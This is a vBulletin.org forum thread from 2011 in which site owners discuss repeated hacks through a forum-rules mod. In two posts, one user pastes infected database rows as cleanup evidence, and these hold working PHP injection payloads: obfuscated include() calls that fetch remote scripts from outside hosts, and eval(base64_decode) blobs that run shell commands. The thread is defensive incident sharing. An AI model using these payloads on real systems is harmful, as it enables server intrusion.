Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
  #31  
Old 05-13-2011, 09:18 PM
madshark's Avatar
madshark madshark is offline
 
Join Date: Oct 2009
Posts: 32
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Ugh! Again? I just got the email as well. Wonder whats wrong now? >< Poor Valter.
Reply With Quote
  #32  
Old 05-13-2011, 09:32 PM
CK CK is offline
 
Join Date: Dec 2007
Location: http://xenforo.com/
Posts: 241
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I keep reading "hacked by team Anus".
Reply With Quote
  #33  
Old 05-13-2011, 09:37 PM
kh99 kh99 is offline
 
Join Date: Aug 2009
Location: Maine
Posts: 13,185
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by borbole View Post
I think in such cases you can contact the admins here.
For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.
Reply With Quote
  #34  
Old 05-13-2011, 11:36 PM
Suiram Suiram is offline
 
Join Date: Jan 2009
Posts: 42
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Bulldog Stang View Post
I have now been hacked twice. I followed the stated guidlines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.
you, me and many others.
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :down:
it' is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before.

UNINSTALL ANY AND ALL MODS - PERIOD!!
Reply With Quote
  #35  
Old 05-13-2011, 11:42 PM
Boofo's Avatar
Boofo Boofo is offline
 
Join Date: Mar 2002
Location: Des Moines, IA (USA)
Posts: 15,776
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Removing all mods is a little extreme, don't you think?
Reply With Quote
  #36  
Old 05-13-2011, 11:52 PM
g0dfather1984 g0dfather1984 is offline
 
Join Date: May 2008
Posts: 449
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Boofo View Post
Removing all mods is a little extreme, don't you think?
While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.
Reply With Quote
  #37  
Old 05-14-2011, 12:29 AM
Suiram Suiram is offline
 
Join Date: Jan 2009
Posts: 42
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough)
Reply With Quote
  #38  
Old 05-14-2011, 12:29 AM
aquariumpros aquariumpros is offline
 
Join Date: Jul 2002
Location: Hawai`i
Posts: 98
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Suiram View Post
you, me and many others.
uninstall this rotten back door to hell. ...

UNINSTALL ANY AND ALL MODS - PERIOD!!
Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).


If you were hacked again - you didn't completely purge the server of the exploitable code.

Ensure that all copies of vba.php have been removed:
/forum/includes/vba.php
/forum/includes/xml/vba.php


Also - check (or get your host to check) your server logs for access.

Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table.


Entries I removed:

| guestid | hostip | useragent | lastactive | spider | script | rdata | a33ea4abd15916de0fe47c20e8efc48f | 203.147.62.92 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1278294864 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:262:"
PHP Code:
echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));;die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 1eafdc25e937348e21e2bb1158b73c48 | 193.71.28.34 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279528160 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"
PHP Code:
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 544953a2c138f10bf32df7677065d1ed | 205.251.131.33 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279527971 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"
PHP Code:
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 494edcf8661b32d80c1078019f0f25a7 | 208.64.68.228 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1280926630 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"
PHP Code:
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 13640f07244b04a849cb78f5c8fc4dbf | 61.47.40.39 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1285330209 | | externalframe | a:9:{s:3:"ref";s:37:"http:/www.t...om/cephcare/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| ad7b15b9bdcf0993071e56659d065a9e | 110.45.165.22 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1290781080 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 23cf7b6e31cd2d81162dc26542cb3f10 | 70.38.37.151 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1290961798 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"
PHP Code:
echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| b70f8e63432d70f392cc060fdc411975 | 174.121.219.80 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1294083379 | | showthread | a:8:{s:6:"postid";i:346415;s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; 
";s:1:"s";s:0:"";s:8:"threadid";i:0;s:7:"forumid"; s:3:"156";s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 51da94725eda052743162729a45c12e4 | 67.192.224.98 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30 | 1294480629 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:"
PHP Code:
eval(base64_decode('ZWNobyAiQkhMVGVhbTxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gQmFsaXNvdXJjZSI7CiRlc2VndWljbWQ9ZXgoJGNtZCk7CmVjaG8gJGVzZWd1aWNtZDsKZnVuY3Rpb24gZXgoJGNmZSl7CiRyZXMgPSAnJzsKaWYgKCFlbXB0eSgkY2ZlKSl7CmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsKQGV4ZWMoJGNmZSwkcmVzKTsKJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpewokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpewpAb2Jfc3RhcnQoKTsKQHN5c3RlbSgkY2ZlKTsKJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsKQG9iX2VuZF9jbGVhbigpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpewpAb2Jfc3RhcnQoKTsKQHBhc3N0aHJ1KCRjZmUpOwokcmVzID0gQG9iX2dldF9jb250ZW50cygpOwpAb2JfZW5kX2NsZWFuKCk7Cn0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsKJHJlcyA9ICIiOwp3aGlsZSghQGZlb2YoJGYpKSB7ICRyZXMgLj0gQGZyZWFkKCRmLDEwMjQpOyB9CkBwY2xvc2UoJGYpOwp9fQpyZXR1cm4gJHJlczsKfQ=='));die; 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 4fe82d2e1e7c29e795a3d5617e803d3b | 195.42.120.131 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1295022885 | | forumdisplay | a:9:{s:1:"f";s:14:"49/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; 
";s:7:"forumid";i:49;s:1:"s";s:0:"";s:6:"postid";i :0;s:8:"threadid";i:0;s:6:"pollid";i:0;s:1:"a";s:0 :"";} |
| 2f85afe9e6bf839981d96c6482d2b90d | 199.124.61.2 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1295771568 | | showthread | a:9:{s:1:"p";s:18:"347103/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:6:"postid";i:347103;s:1:"s";s:0:"";s:8:"thread id";i:0;s:7:"forumid";s:2:"28";s:6:"pollid";i:0;s: 1:"a";s:0:"";} |
| ffb65c6cc094dcbfbb05b96e368d9c53 | 208.91.57.65 | Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 | 1295778092 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| e783bb5c77bf9a59f9d63d9551a53cd6 | 81.94.196.51 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1297787694 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| bbc645e5264e506520e938c779d4f23d | 67.192.224.98 | Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4 | 1298619810 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:"
PHP Code:
eval(base64_decode('ZWNobyAiQkhMVGVhbTxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gVW5EZXJHcm91bkQiOwokZXNlZ3VpY21kPWV4KCRjbWQpOwplY2hvICRlc2VndWljbWQ7CmZ1bmN0aW9uIGV4KCRjZmUpewokcmVzID0gJyc7CmlmICghZW1wdHkoJGNmZSkpewppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7CkBleGVjKCRjZmUsJHJlcyk7CiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsKJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsKQG9iX3N0YXJ0KCk7CkBzeXN0ZW0oJGNmZSk7CiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7CkBvYl9lbmRfY2xlYW4oKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsKQG9iX3N0YXJ0KCk7CkBwYXNzdGhydSgkY2ZlKTsKJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsKQG9iX2VuZF9jbGVhbigpOwp9CmVsc2VpZihAaXNfcmVzb3VyY2UoJGYgPSBAcG9wZW4oJGNmZSwiciIpKSl7CiRyZXMgPSAiIjsKd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQpAcGNsb3NlKCRmKTsKfX0KcmV0dXJuICRyZXM7Cn0='));die; 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |


...cont'd in next post due to character limits
Reply With Quote
  #39  
Old 05-14-2011, 12:30 AM
aquariumpros aquariumpros is offline
 
Join Date: Jul 2002
Location: Hawai`i
Posts: 98
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

| 8c4734033eff728379948bcfb8f45653 | 202.136.168.37 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1299793822 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N